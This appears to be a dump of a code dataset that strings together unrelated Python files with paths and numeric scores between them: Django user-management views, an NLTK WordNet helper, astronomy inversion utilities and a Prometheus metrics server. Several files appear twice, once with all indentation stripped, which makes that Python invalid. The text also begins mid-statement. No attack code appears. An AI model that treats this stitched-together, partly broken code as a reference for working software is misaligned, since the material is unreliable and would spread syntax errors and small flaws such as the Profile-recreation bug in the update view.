}, safe=False, status=400) | smart_cctv/users/views.py | from django.http.response import Http404, HttpResponse, HttpResponseRedirect, JsonResponse
from django.shortcuts import render
from django.contrib.auth.decorators import login_required
from django.urls import reverse
from rest_framework.parsers import JSONParser
from rest_framework.decorators import api_view
from django.contrib.auth.models import User
from .models import Profile
import json
@login_required
# Create your views here.
def index(request):
users = User.objects.all().select_related('profile')[:15]
return render(request, 'users/index.html', { 'users': users })
@login_required
def create(request):
if request.user.profile.role != 'Admin':
return HttpResponseRedirect(reverse('users.index'))
return render(request, 'users/create.html')
@login_required
def edit(request, id):
if request.user.profile.role != 'Admin':
return HttpResponseRedirect(reverse('users.index'))
users = User.objects.filter(pk=id).select_related('profile')
if len(users) <= 0:
raise Http404('User does not exists.')
return render(request, 'users/edit.html', { 'mUser': users[0] })
@login_required
@api_view(['GET'])
def search(request):
q = request.GET['q']
users = User.objects.filter(username__contains=q).select_related('profile').values('username', 'first_name', 'last_name', 'profile__role', 'profile__sex')
return JsonResponse({
'users': json.dumps(list(users))
}, safe=False)
@login_required
@api_view(['POST'])
def store(request):
try:
if request.user.profile.role != 'Admin':
raise Exception('You do not have permsision to make this operation.')
body = request.data
user = User.objects.create(username=body['username'], first_name=body['first_name'], last_name=body['last_name'])
user.set_password(body['password'])
user.profile.sex = body['sex']
user.profile.role = body['role']
user.save()
return JsonResponse({
'message': 'Successfully created a user.'
}, safe=False)
except Exception as e:
return JsonResponse({
'message': str(e)
}, safe=False, status=400)
@login_required
@api_view(['PATCH'])
def update(request, id):
try:
if request.user.profile.role != 'Admin':
raise Exception('You do not have permsision to make this operation.')
body = request.data
user = User.objects.get(pk=id)
user.username = body['username']
user.first_name = body['first_name']
user.last_name = body['last_name']
if body['password']:
user.set_password(body['password'])
profile = Profile(user=user, sex=body['sex'], role=body['role'])
user.save()
profile.save()
return JsonResponse({
'message': 'Successfully updated a user.'
}, safe=False)
except User.DoesNotExist:
return JsonResponse({
'message': 'User does not exists.'
}, safe=False, status=400)
except Exception as e:
return JsonResponse({
'message': str(e)
}, safe=False, status=400)
@login_required
@api_view(['DELETE'])
def delete(request, id):
try:
if request.user.profile.role != 'Admin':
raise Exception('You do not have permsision to make this operation.')
user = User.objects.get(pk=id)
if user.is_staff:
raise Exception('You do not have permsision to make this operation.')
user.delete()
return JsonResponse({
'message': 'Successfully deleted a user.'
})
except User.DoesNotExist:
return JsonResponse({
'message': 'User does not exists.'
}, safe=False, status=400)
except Exception as e:
return JsonResponse({
'message': str(e)
}, safe=False, status=400) | 0.427277 | 0.05526 |
from nltk.corpus import wordnet as wn
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
from nltk.stem.wordnet import WordNetLemmatizer
import nltk
def get_words_with_all_langs(synset_id):
langs = sorted(wn.langs())
list_lang = []
list_useful_lang=[]
for lang in langs:
if lang not in list_lang:
list_lang.append(lang)
dict_lang={}
for lang in list_lang:
try:
names = wn.synset(synset_id).lemma_names(lang)
# print(lang, names)
if len(names)!=0:
dict_lang[lang]=names
if lang not in list_useful_lang:
list_useful_lang.append(lang)
except:
# print("Error: Lang: "+lang)
pass
return dict_lang,list_useful_lang
def get_words_from_sentence(sentence):
word_list=word_tokenize(sentence)
filtered_words = [word.lower() for word in word_list if word not in stopwords.words('english')]
# st = LancasterStemmer()
lem = WordNetLemmatizer()
list_w=[]
for w in filtered_words:
list_w.append(lem.lemmatize(w))
return list_w
def get_hyponyms(synset_name):
synsets=wn.synset(synset_name).hyponyms()
dict_lang_all = {}
for synset in synsets:
synset_name = synset.name()
dict_langs, list_useful_lang = get_words_with_all_langs(synset_name)
for lang in list_useful_lang:
if lang in dict_lang_all:
for ww in dict_langs[lang]:
dict_lang_all[lang].append(ww)
else:
dict_lang_all[lang] = []
for ww in dict_langs[lang]:
dict_lang_all[lang].append(ww)
return dict_lang_all
def get_hypernyms(synset_name):
synsets=wn.synset(synset_name).hypernyms()
dict_lang_all = {}
for synset in synsets:
synset_name = synset.name()
dict_langs, list_useful_lang = get_words_with_all_langs(synset_name)
for lang in list_useful_lang:
if lang in dict_lang_all:
for ww in dict_langs[lang]:
dict_lang_all[lang].append(ww)
else:
dict_lang_all[lang] = []
for ww in dict_langs[lang]:
dict_lang_all[lang].append(ww)
return dict_lang_all
def get_all_related_word_from_text(text,use_hyponym=False,use_hypernym=False):
word_list = get_words_from_sentence(text)
print(word_list)
dict_lang_all = {}
for w in word_list:
print(w)
synsets = wn.synsets(w)
print(synsets)
for synset in synsets:
synset_name = synset.name()
print("synset.name = ", synset_name)
dict_langs, list_useful_lang = get_words_with_all_langs(synset_name)
print(dict_langs)
# current
for lang in list_useful_lang:
if lang in dict_lang_all:
for ww in dict_langs[lang]:
dict_lang_all[lang].append(ww)
else:
dict_lang_all[lang] = []
for ww in dict_langs[lang]:
dict_lang_all[lang].append(ww)
# hyponyms
if use_hyponym:
dict_lang_hyponyms=get_hyponyms(synset_name)
for lang in dict_lang_hyponyms:
if lang in dict_lang_all:
for ww in dict_lang_hyponyms[lang]:
dict_lang_all[lang].append(ww)
else:
dict_lang_all[lang] = []
for ww in dict_lang_hyponyms[lang]:
dict_lang_all[lang].append(ww)
# hypernyms
if use_hypernym:
dict_lang_hypernyms = get_hypernyms(synset_name)
for lang in dict_lang_hypernyms:
if lang in dict_lang_all:
for ww in dict_lang_hypernyms[lang]:
dict_lang_all[lang].append(ww)
else:
dict_lang_all[lang] = []
for ww in dict_lang_hypernyms[lang]:
dict_lang_all[lang].append(ww)
# print()
return dict_lang_all | src/semantickit/lang/wordnet.py | from nltk.corpus import wordnet as wn
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
from nltk.stem.wordnet import WordNetLemmatizer
import nltk
def get_words_with_all_langs(synset_id):
langs = sorted(wn.langs())
list_lang = []
list_useful_lang=[]
for lang in langs:
if lang not in list_lang:
list_lang.append(lang)
dict_lang={}
for lang in list_lang:
try:
names = wn.synset(synset_id).lemma_names(lang)
# print(lang, names)
if len(names)!=0:
dict_lang[lang]=names
if lang not in list_useful_lang:
list_useful_lang.append(lang)
except:
# print("Error: Lang: "+lang)
pass
return dict_lang,list_useful_lang
def get_words_from_sentence(sentence):
word_list=word_tokenize(sentence)
filtered_words = [word.lower() for word in word_list if word not in stopwords.words('english')]
# st = LancasterStemmer()
lem = WordNetLemmatizer()
list_w=[]
for w in filtered_words:
list_w.append(lem.lemmatize(w))
return list_w
def get_hyponyms(synset_name):
synsets=wn.synset(synset_name).hyponyms()
dict_lang_all = {}
for synset in synsets:
synset_name = synset.name()
dict_langs, list_useful_lang = get_words_with_all_langs(synset_name)
for lang in list_useful_lang:
if lang in dict_lang_all:
for ww in dict_langs[lang]:
dict_lang_all[lang].append(ww)
else:
dict_lang_all[lang] = []
for ww in dict_langs[lang]:
dict_lang_all[lang].append(ww)
return dict_lang_all
def get_hypernyms(synset_name):
synsets=wn.synset(synset_name).hypernyms()
dict_lang_all = {}
for synset in synsets:
synset_name = synset.name()
dict_langs, list_useful_lang = get_words_with_all_langs(synset_name)
for lang in list_useful_lang:
if lang in dict_lang_all:
for ww in dict_langs[lang]:
dict_lang_all[lang].append(ww)
else:
dict_lang_all[lang] = []
for ww in dict_langs[lang]:
dict_lang_all[lang].append(ww)
return dict_lang_all
def get_all_related_word_from_text(text,use_hyponym=False,use_hypernym=False):
word_list = get_words_from_sentence(text)
print(word_list)
dict_lang_all = {}
for w in word_list:
print(w)
synsets = wn.synsets(w)
print(synsets)
for synset in synsets:
synset_name = synset.name()
print("synset.name = ", synset_name)
dict_langs, list_useful_lang = get_words_with_all_langs(synset_name)
print(dict_langs)
# current
for lang in list_useful_lang:
if lang in dict_lang_all:
for ww in dict_langs[lang]:
dict_lang_all[lang].append(ww)
else:
dict_lang_all[lang] = []
for ww in dict_langs[lang]:
dict_lang_all[lang].append(ww)
# hyponyms
if use_hyponym:
dict_lang_hyponyms=get_hyponyms(synset_name)
for lang in dict_lang_hyponyms:
if lang in dict_lang_all:
for ww in dict_lang_hyponyms[lang]:
dict_lang_all[lang].append(ww)
else:
dict_lang_all[lang] = []
for ww in dict_lang_hyponyms[lang]:
dict_lang_all[lang].append(ww)
# hypernyms
if use_hypernym:
dict_lang_hypernyms = get_hypernyms(synset_name)
for lang in dict_lang_hypernyms:
if lang in dict_lang_all:
for ww in dict_lang_hypernyms[lang]:
dict_lang_all[lang].append(ww)
else:
dict_lang_all[lang] = []
for ww in dict_lang_hypernyms[lang]:
dict_lang_all[lang].append(ww)
# print()
return dict_lang_all | 0.084429 | 0.054024 |
from autoarray import decorator_util
import numpy as np
from astropy.io import fits
import os
@decorator_util.jit()
def data_vector_from_blurred_mapping_matrix_and_data(
blurred_mapping_matrix, image, noise_map
):
"""Compute the hyper_galaxies vector *D* from a blurred util matrix *f* and the 1D image *d* and 1D noise-map *\sigma* \
(see Warren & Dye 2003).
Parameters
-----------
blurred_mapping_matrix : ndarray
The matrix representing the blurred mappings between sub-grid pixels and pixelization pixels.
image : ndarray
Flattened 1D array of the observed image the inversion is fitting.
noise_map : ndarray
Flattened 1D array of the noise-map used by the inversion during the fit.
"""
mapping_shape = blurred_mapping_matrix.shape
data_vector = np.zeros(mapping_shape[1])
for mask_1d_index in range(mapping_shape[0]):
for pix_1_index in range(mapping_shape[1]):
data_vector[pix_1_index] += (
image[mask_1d_index]
* blurred_mapping_matrix[mask_1d_index, pix_1_index]
/ (noise_map[mask_1d_index] ** 2.0)
)
return data_vector
def curvature_matrix_from_blurred_mapping_matrix(blurred_mapping_matrix, noise_map):
"""Compute the curvature matrix *F* from a blurred util matrix *f* and the 1D noise-map *\sigma* \
(see Warren & Dye 2003).
Parameters
-----------
blurred_mapping_matrix : ndarray
The matrix representing the blurred mappings between sub-grid pixels and pixelization pixels.
noise_map : ndarray
Flattened 1D array of the noise-map used by the inversion during the fit.
"""
flist = np.zeros(blurred_mapping_matrix.shape[1])
iflist = np.zeros(blurred_mapping_matrix.shape[1], dtype="int")
return curvature_matrix_from_blurred_mapping_matrix_jit(
blurred_mapping_matrix, noise_map, flist, iflist
)
@decorator_util.jit()
def curvature_matrix_from_blurred_mapping_matrix_jit(
blurred_mapping_matrix, noise_map, flist, iflist
):
"""Compute the curvature matrix *F* from a blurred util matrix *f* and the 1D noise-map *\sigma* \
(see Warren & Dye 2003).
Parameters
-----------
blurred_mapping_matrix : ndarray
The matrix representing the blurred mappings between sub-grid pixels and pixelization pixels.
noise_map : ndarray
Flattened 1D array of the noise-map used by the inversion during the fit.
flist : ndarray
NumPy array of floats used to store mappings for efficienctly calculation.
iflist : ndarray
NumPy array of integers used to store mappings for efficienctly calculation.
"""
curvature_matrix = np.zeros(
(blurred_mapping_matrix.shape[1], blurred_mapping_matrix.shape[1])
)
for mask_1d_index in range(blurred_mapping_matrix.shape[0]):
index = 0
for pix_1_index in range(blurred_mapping_matrix.shape[1]):
if blurred_mapping_matrix[mask_1d_index, pix_1_index] > 0.0:
flist[index] = (
blurred_mapping_matrix[mask_1d_index, pix_1_index]
/ noise_map[mask_1d_index]
)
iflist[index] = pix_1_index
index += 1
if index > 0:
for i1 in range(index):
for j1 in range(index):
ix = iflist[i1]
iy = iflist[j1]
curvature_matrix[ix, iy] += flist[i1] * flist[j1]
for i in range(blurred_mapping_matrix.shape[1]):
for j in range(blurred_mapping_matrix.shape[1]):
curvature_matrix[i, j] = curvature_matrix[j, i]
return curvature_matrix
@decorator_util.jit()
def mapped_reconstructed_data_from_mapping_matrix_and_reconstruction(
mapping_matrix, reconstruction
):
""" Compute the reconstructed hyper_galaxies vector from the blurrred util matrix *f* and solution vector *S*.
Parameters
-----------
mapping_matrix : ndarray
The matrix representing the blurred mappings between sub-grid pixels and pixelization pixels.
"""
mapped_reconstructred_data = np.zeros(mapping_matrix.shape[0])
for i in range(mapping_matrix.shape[0]):
for j in range(reconstruction.shape[0]):
mapped_reconstructred_data[i] += reconstruction[j] * mapping_matrix[i, j]
return mapped_reconstructred_data
@decorator_util.jit()
def data_vector_from_transformed_mapping_matrix_and_data(
transformed_mapping_matrix, visibilities, noise_map
):
"""Compute the hyper_galaxies vector *D* from a transformed util matrix *f* and the 1D image *d* and 1D noise-map *\sigma* \
(see Warren & Dye 2003).
Parameters
-----------
transformed_mapping_matrix : ndarray
The matrix representing the transformed mappings between sub-grid pixels and pixelization pixels.
image : ndarray
Flattened 1D array of the observed image the inversion is fitting.
noise_map : ndarray
Flattened 1D array of the noise-map used by the inversion during the fit.
"""
data_vector = np.zeros(transformed_mapping_matrix.shape[1])
for vis_1d_index in range(transformed_mapping_matrix.shape[0]):
for pix_1d_index in range(transformed_mapping_matrix.shape[1]):
data_vector[pix_1d_index] += (
visibilities[vis_1d_index]
* transformed_mapping_matrix[vis_1d_index, pix_1d_index]
/ (noise_map[vis_1d_index] ** 2.0)
)
return data_vector
def curvature_matrix_from_transformed_mapping_matrix(
transformed_mapping_matrix, noise_map
):
"""Compute the curvature matrix *F* from a transformed util matrix *f* and the 1D noise-map *\sigma* \
(see Warren & Dye 2003).
Parameters
-----------
transformed_mapping_matrix : ndarray
The matrix representing the transformed mappings between sub-grid pixels and pixelization pixels.
noise_map : ndarray
Flattened 1D array of the noise-map used by the inversion during the fit.
flist : ndarray
NumPy array of floats used to store mappings for efficienctly calculation.
iflist : ndarray
NumPy array of integers used to store mappings for efficienctly calculation.
"""
array = transformed_mapping_matrix / noise_map[:, None]
curvature_matrix = np.dot(array.T, np.matrix.transpose(array.T))
return curvature_matrix
def inversion_residual_map_from_pixelization_values_and_data(
pixelization_values,
data,
mask_1d_index_for_sub_mask_1d_index,
all_sub_mask_1d_indexes_for_pixelization_1d_index,
):
residual_map = np.zeros(
shape=len(all_sub_mask_1d_indexes_for_pixelization_1d_index)
)
for pix_1_index, sub_mask_1d_indexes in enumerate(
all_sub_mask_1d_indexes_for_pixelization_1d_index
):
sub_mask_total = 0
for sub_mask_1d_index in sub_mask_1d_indexes:
sub_mask_total += 1
mask_1d_index = mask_1d_index_for_sub_mask_1d_index[sub_mask_1d_index]
residual = data[mask_1d_index] - pixelization_values[pix_1_index]
residual_map[pix_1_index] += np.abs(residual)
if sub_mask_total > 0:
residual_map[pix_1_index] /= sub_mask_total
return residual_map.copy()
def inversion_normalized_residual_map_from_pixelization_values_and_reconstructed_data_1d(
pixelization_values,
data,
noise_map_1d,
mask_1d_index_for_sub_mask_1d_index,
all_sub_mask_1d_indexes_for_pixelization_1d_index,
):
normalized_residual_map = np.zeros(
shape=len(all_sub_mask_1d_indexes_for_pixelization_1d_index)
)
for pix_1_index, sub_mask_1d_indexes in enumerate(
all_sub_mask_1d_indexes_for_pixelization_1d_index
):
sub_mask_total = 0
for sub_mask_1d_index in sub_mask_1d_indexes:
sub_mask_total += 1
mask_1d_index = mask_1d_index_for_sub_mask_1d_index[sub_mask_1d_index]
residual = data[mask_1d_index] - pixelization_values[pix_1_index]
normalized_residual_map[pix_1_index] += np.abs(
(residual / noise_map_1d[mask_1d_index])
)
if sub_mask_total > 0:
normalized_residual_map[pix_1_index] /= sub_mask_total
return normalized_residual_map.copy()
def inversion_chi_squared_map_from_pixelization_values_and_reconstructed_data_1d(
pixelization_values,
data,
noise_map_1d,
mask_1d_index_for_sub_mask_1d_index,
all_sub_mask_1d_indexes_for_pixelization_1d_index,
):
chi_squared_map = np.zeros(
shape=len(all_sub_mask_1d_indexes_for_pixelization_1d_index)
)
for pix_1_index, sub_mask_1d_indexes in enumerate(
all_sub_mask_1d_indexes_for_pixelization_1d_index
):
sub_mask_total = 0
for sub_mask_1d_index in sub_mask_1d_indexes:
sub_mask_total += 1
mask_1d_index = mask_1d_index_for_sub_mask_1d_index[sub_mask_1d_index]
residual = data[mask_1d_index] - pixelization_values[pix_1_index]
chi_squared_map[pix_1_index] += (
residual / noise_map_1d[mask_1d_index]
) ** 2.0
if sub_mask_total > 0:
chi_squared_map[pix_1_index] /= sub_mask_total
return chi_squared_map.copy() | autoarray/util/inversion_util.py | from autoarray import decorator_util
import numpy as np
from astropy.io import fits
import os
@decorator_util.jit()
def data_vector_from_blurred_mapping_matrix_and_data(
    blurred_mapping_matrix, image, noise_map
):
    """Compute the hyper_galaxies vector *D* from a blurred util matrix *f* and the 1D image *d* and 1D noise-map *\sigma* \
    (see Warren & Dye 2003).

    D_j = sum_i image_i * f_ij / sigma_i^2, accumulated with explicit loops so
    the function remains compatible with the jit decorator.

    Parameters
    -----------
    blurred_mapping_matrix : ndarray
        The matrix representing the blurred mappings between sub-grid pixels and pixelization pixels.
    image : ndarray
        Flattened 1D array of the observed image the inversion is fitting.
    noise_map : ndarray
        Flattened 1D array of the noise-map used by the inversion during the fit.

    Returns
    -------
    ndarray
        The data vector *D*, one entry per pixelization pixel.
    """
    # mapping_shape = (number of image pixels, number of pixelization pixels).
    mapping_shape = blurred_mapping_matrix.shape
    data_vector = np.zeros(mapping_shape[1])
    for mask_1d_index in range(mapping_shape[0]):
        for pix_1_index in range(mapping_shape[1]):
            # Inverse-variance weighted contribution of each image pixel.
            data_vector[pix_1_index] += (
                image[mask_1d_index]
                * blurred_mapping_matrix[mask_1d_index, pix_1_index]
                / (noise_map[mask_1d_index] ** 2.0)
            )
    return data_vector
def curvature_matrix_from_blurred_mapping_matrix(blurred_mapping_matrix, noise_map):
    """Compute the curvature matrix *F* from a blurred util matrix *f* and the
    1D noise-map *\sigma* (see Warren & Dye 2003).

    Allocates the scratch buffers required by the jitted kernel and delegates
    the accumulation to it.
    """
    pixelization_pixel_total = blurred_mapping_matrix.shape[1]
    # Scratch space reused per image pixel: noise-whitened mapping values and
    # the pixelization-pixel indices they belong to.
    flist = np.zeros(pixelization_pixel_total)
    iflist = np.zeros(pixelization_pixel_total, dtype="int")
    return curvature_matrix_from_blurred_mapping_matrix_jit(
        blurred_mapping_matrix, noise_map, flist, iflist
    )
@decorator_util.jit()
def curvature_matrix_from_blurred_mapping_matrix_jit(
    blurred_mapping_matrix, noise_map, flist, iflist
):
    """Compute the curvature matrix *F* from a blurred util matrix *f* and the 1D noise-map *\sigma* \
    (see Warren & Dye 2003).

    F_ij = sum_k f_ki * f_kj / sigma_k^2, accumulated one image pixel at a
    time using only that pixel's non-zero mapping entries.

    Parameters
    -----------
    blurred_mapping_matrix : ndarray
        The matrix representing the blurred mappings between sub-grid pixels and pixelization pixels.
    noise_map : ndarray
        Flattened 1D array of the noise-map used by the inversion during the fit.
    flist : ndarray
        NumPy array of floats used as scratch space for efficient calculation.
    iflist : ndarray
        NumPy array of integers used as scratch space for efficient calculation.
    """
    curvature_matrix = np.zeros(
        (blurred_mapping_matrix.shape[1], blurred_mapping_matrix.shape[1])
    )
    for mask_1d_index in range(blurred_mapping_matrix.shape[0]):
        index = 0
        # Gather this image pixel's non-zero, noise-whitened mapping values
        # (flist) and the pixelization pixels they map to (iflist).
        for pix_1_index in range(blurred_mapping_matrix.shape[1]):
            if blurred_mapping_matrix[mask_1d_index, pix_1_index] > 0.0:
                flist[index] = (
                    blurred_mapping_matrix[mask_1d_index, pix_1_index]
                    / noise_map[mask_1d_index]
                )
                iflist[index] = pix_1_index
                index += 1
        # Accumulate the outer product of the gathered values; i1 and j1 both
        # span the full gathered set, so each (ix, iy) pair is visited in both
        # orders.
        if index > 0:
            for i1 in range(index):
                for j1 in range(index):
                    ix = iflist[i1]
                    iy = iflist[j1]
                    curvature_matrix[ix, iy] += flist[i1] * flist[j1]
    # NOTE(review): the accumulation above already fills both triangles
    # symmetrically, so this mirroring pass appears redundant -- confirm
    # against the upstream algorithm before simplifying.
    for i in range(blurred_mapping_matrix.shape[1]):
        for j in range(blurred_mapping_matrix.shape[1]):
            curvature_matrix[i, j] = curvature_matrix[j, i]
    return curvature_matrix
@decorator_util.jit()
def mapped_reconstructed_data_from_mapping_matrix_and_reconstruction(
    mapping_matrix, reconstruction
):
    """ Compute the reconstructed hyper_galaxies vector from the blurrred util matrix *f* and solution vector *S*.

    Performs the matrix-vector product f . S with explicit loops for jit
    compatibility.

    Parameters
    -----------
    mapping_matrix : ndarray
        The matrix representing the blurred mappings between sub-grid pixels and pixelization pixels.
    reconstruction : ndarray
        The solution vector *S*, one value per pixelization pixel.

    Returns
    -------
    ndarray
        One reconstructed data value per image pixel.
    """
    mapped_reconstructred_data = np.zeros(mapping_matrix.shape[0])
    for i in range(mapping_matrix.shape[0]):
        for j in range(reconstruction.shape[0]):
            mapped_reconstructred_data[i] += reconstruction[j] * mapping_matrix[i, j]
    return mapped_reconstructred_data
@decorator_util.jit()
def data_vector_from_transformed_mapping_matrix_and_data(
    transformed_mapping_matrix, visibilities, noise_map
):
    """Compute the hyper_galaxies vector *D* from a transformed util matrix *f* and the 1D visibilities *d* and 1D noise-map *\sigma* \
    (see Warren & Dye 2003).

    Parameters
    -----------
    transformed_mapping_matrix : ndarray
        The matrix representing the transformed mappings between sub-grid pixels and pixelization pixels.
    visibilities : ndarray
        Flattened 1D array of the observed visibilities the inversion is fitting.
    noise_map : ndarray
        Flattened 1D array of the noise-map used by the inversion during the fit.

    Returns
    -------
    ndarray
        The data vector *D*, one entry per pixelization pixel.
    """
    data_vector = np.zeros(transformed_mapping_matrix.shape[1])
    for vis_1d_index in range(transformed_mapping_matrix.shape[0]):
        for pix_1d_index in range(transformed_mapping_matrix.shape[1]):
            # Inverse-variance weighted contribution of each visibility.
            data_vector[pix_1d_index] += (
                visibilities[vis_1d_index]
                * transformed_mapping_matrix[vis_1d_index, pix_1d_index]
                / (noise_map[vis_1d_index] ** 2.0)
            )
    return data_vector
def curvature_matrix_from_transformed_mapping_matrix(
    transformed_mapping_matrix, noise_map
):
    """Compute the curvature matrix *F* from a transformed util matrix *f* and the 1D noise-map *\sigma* \
    (see Warren & Dye 2003).

    F_ij = sum_k f_ki * f_kj / sigma_k^2, computed by whitening the mapping
    matrix by the noise-map and forming its Gram matrix.

    Parameters
    -----------
    transformed_mapping_matrix : ndarray
        The matrix representing the transformed mappings between sub-grid pixels and pixelization pixels.
    noise_map : ndarray
        Flattened 1D array of the noise-map used by the inversion during the fit.

    Returns
    -------
    ndarray
        The symmetric (pixelization, pixelization) curvature matrix *F*.
    """
    # Whiten each row (visibility) of the mapping matrix by its noise value.
    array = transformed_mapping_matrix / noise_map[:, None]
    # Previously written as np.dot(array.T, np.matrix.transpose(array.T));
    # np.matrix is deprecated and transpose(array.T) is just `array`, so form
    # the Gram matrix directly.
    return np.dot(array.T, array)
def inversion_residual_map_from_pixelization_values_and_data(
    pixelization_values,
    data,
    mask_1d_index_for_sub_mask_1d_index,
    all_sub_mask_1d_indexes_for_pixelization_1d_index,
):
    """For every pixelization pixel, compute the mean absolute residual
    |data - reconstruction| over the sub-mask pixels that map to it.

    Pixelization pixels with no contributing sub-mask pixels are left at zero.
    """
    pixelization_total = len(all_sub_mask_1d_indexes_for_pixelization_1d_index)
    residual_map = np.zeros(shape=pixelization_total)
    for pix_index in range(pixelization_total):
        residual_total = 0.0
        contribution_count = 0
        for sub_index in all_sub_mask_1d_indexes_for_pixelization_1d_index[pix_index]:
            contribution_count += 1
            data_index = mask_1d_index_for_sub_mask_1d_index[sub_index]
            residual_total += np.abs(data[data_index] - pixelization_values[pix_index])
        if contribution_count > 0:
            residual_map[pix_index] = residual_total / contribution_count
    return residual_map.copy()
def inversion_normalized_residual_map_from_pixelization_values_and_reconstructed_data_1d(
    pixelization_values,
    data,
    noise_map_1d,
    mask_1d_index_for_sub_mask_1d_index,
    all_sub_mask_1d_indexes_for_pixelization_1d_index,
):
    """For every pixelization pixel, compute the mean of
    |(data - reconstruction) / noise| over the sub-mask pixels that map to it.

    Parameters
    -----------
    pixelization_values : ndarray
        The reconstructed value of every pixelization pixel.
    data : ndarray
        Flattened 1D array of the data being fitted.
    noise_map_1d : ndarray
        Flattened 1D array of the noise-map of the data.
    mask_1d_index_for_sub_mask_1d_index : ndarray
        Mapping from every sub-mask pixel index to its mask pixel index.
    all_sub_mask_1d_indexes_for_pixelization_1d_index : [[int]]
        For every pixelization pixel, the sub-mask pixels that map to it.

    Returns
    -------
    ndarray
        One mean absolute normalized residual per pixelization pixel (zero for
        pixelization pixels no sub-mask pixel maps to).
    """
    normalized_residual_map = np.zeros(
        shape=len(all_sub_mask_1d_indexes_for_pixelization_1d_index)
    )
    for pix_1_index, sub_mask_1d_indexes in enumerate(
        all_sub_mask_1d_indexes_for_pixelization_1d_index
    ):
        sub_mask_total = 0
        for sub_mask_1d_index in sub_mask_1d_indexes:
            sub_mask_total += 1
            mask_1d_index = mask_1d_index_for_sub_mask_1d_index[sub_mask_1d_index]
            residual = data[mask_1d_index] - pixelization_values[pix_1_index]
            normalized_residual_map[pix_1_index] += np.abs(
                (residual / noise_map_1d[mask_1d_index])
            )
        # Average over contributing sub-pixels; guard against empty mappings.
        if sub_mask_total > 0:
            normalized_residual_map[pix_1_index] /= sub_mask_total
    return normalized_residual_map.copy()
def inversion_chi_squared_map_from_pixelization_values_and_reconstructed_data_1d(
    pixelization_values,
    data,
    noise_map_1d,
    mask_1d_index_for_sub_mask_1d_index,
    all_sub_mask_1d_indexes_for_pixelization_1d_index,
):
    """For every pixelization pixel, compute the mean chi-squared value
    ((data - reconstruction) / noise)^2 over the sub-mask pixels that map
    to it.

    Pixelization pixels with no contributing sub-mask pixels are left at zero.
    """
    pixelization_total = len(all_sub_mask_1d_indexes_for_pixelization_1d_index)
    chi_squared_map = np.zeros(shape=pixelization_total)
    for pix_index in range(pixelization_total):
        chi_squared_total = 0.0
        contribution_count = 0
        for sub_index in all_sub_mask_1d_indexes_for_pixelization_1d_index[pix_index]:
            contribution_count += 1
            data_index = mask_1d_index_for_sub_mask_1d_index[sub_index]
            residual = data[data_index] - pixelization_values[pix_index]
            chi_squared_total += (residual / noise_map_1d[data_index]) ** 2.0
        if contribution_count > 0:
            chi_squared_map[pix_index] = chi_squared_total / contribution_count
    return chi_squared_map.copy()
import json
import threading
from socket import gethostname
from typing import Any, Dict, List, Tuple, Sequence
from http.server import HTTPServer
from prometheus_client.exposition import MetricsHandler
from . import app_settings
from .types import QueueName, WorkerNumber
def get_config_response(
    worker_queue_and_counts: Sequence[Tuple[QueueName, WorkerNumber]],
) -> List[Dict[str, Any]]:
    """
    Build the Prometheus scrape-target description for every running queue
    worker: one entry per worker containing its "host:port" target plus
    queue-name and worker-number labels.
    """
    entries = []
    for index, (queue, worker_num) in enumerate(worker_queue_and_counts, start=1):
        target = "{}:{}".format(
            gethostname(),
            app_settings.PROMETHEUS_START_PORT + index,
        )
        entries.append(
            {
                "targets": [target],
                "labels": {
                    "django_lightweight_queue_worker_queue": queue,
                    "django_lightweight_queue_worker_num": str(worker_num),
                },
            }
        )
    return entries
def metrics_http_server(
    worker_queue_and_counts: Sequence[Tuple[QueueName, WorkerNumber]],
) -> threading.Thread:
    """Create (without starting) a daemon thread that serves Prometheus
    metrics on PROMETHEUS_START_PORT, plus a /worker_config endpoint
    describing every worker's scrape target."""
    # The worker configuration is fixed for the life of the process, so the
    # JSON payload is rendered once up front.
    config_response = json.dumps(
        get_config_response(worker_queue_and_counts),
        sort_keys=True,
        indent=4,
    ).encode('utf-8')

    class RequestHandler(MetricsHandler, object):
        def do_GET(self):
            # /worker_config is served from the pre-rendered payload; every
            # other path falls through to prometheus_client's handler.
            if self.path != "/worker_config":
                return super(RequestHandler, self).do_GET()
            self.send_response(200)
            self.end_headers()
            return self.wfile.write(config_response)

    class MetricsServer(threading.Thread):
        def __init__(self, *args, **kwargs):
            super(MetricsServer, self).__init__(*args, **kwargs)

        def run(self):
            server = HTTPServer(('0.0.0.0', app_settings.PROMETHEUS_START_PORT), RequestHandler)
            server.timeout = 2
            try:
                server.serve_forever()
            except KeyboardInterrupt:
                pass

    return MetricsServer(name="Master Prometheus metrics server", daemon=True)
import threading
from socket import gethostname
from typing import Any, Dict, List, Tuple, Sequence
from http.server import HTTPServer
from prometheus_client.exposition import MetricsHandler
from . import app_settings
from .types import QueueName, WorkerNumber
def get_config_response(
    worker_queue_and_counts: Sequence[Tuple[QueueName, WorkerNumber]],
) -> List[Dict[str, Any]]:
    """
    This is designed to be used by Prometheus, to direct it to scrape the
    correct ports and assign the correct labels to pull in data from all the
    running queue workers.

    Returns one entry per worker in Prometheus HTTP service-discovery format:
    a "host:port" scrape target plus queue-name / worker-number labels.
    """
    return [
        {
            "targets": [
                "{}:{}".format(
                    gethostname(),
                    app_settings.PROMETHEUS_START_PORT + index,
                ),
            ],
            "labels": {
                "django_lightweight_queue_worker_queue": queue,
                "django_lightweight_queue_worker_num": str(worker_num),
            },
        }
        # start=1: presumably PROMETHEUS_START_PORT itself is reserved for the
        # master metrics server (it is bound in metrics_http_server), so
        # workers get START_PORT + 1 onwards -- TODO confirm against the
        # worker startup code.
        for index, (queue, worker_num) in enumerate(worker_queue_and_counts, start=1)
    ]
def metrics_http_server(
worker_queue_and_counts: Sequence[Tuple[QueueName, WorkerNumber]],
) -> threading.Thread:
config_response = json.dumps(
get_config_response(worker_queue_and_counts),
sort_keys=True,
indent=4,
).encode('utf-8')
class RequestHandler(MetricsHandler, object):
def do_GET(self):
if self.path == "/worker_config":
self.send_response(200)
self.end_headers()
return self.wfile.write(config_response)
return super(RequestHandler, self).do_GET()
class MetricsServer(threading.Thread):
def __init__(self, *args, **kwargs):
super(MetricsServer, self).__init__(*args, **kwargs)
def run(self):
httpd = HTTPServer(('0.0.0.0', app_settings.PROMETHEUS_START_PORT), RequestHandler)
httpd.timeout = 2
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass
return MetricsServer(name="Master Prometheus metrics server", daemon=True) | 0.66454 | 0.143998 |
import numpy as np
from distpy import sequence_types
try:
# this runs with no issues in python 2 but raises error in python 3
basestring
except:
# this try/except allows for python 2/3 compatible string type checking
basestring = str
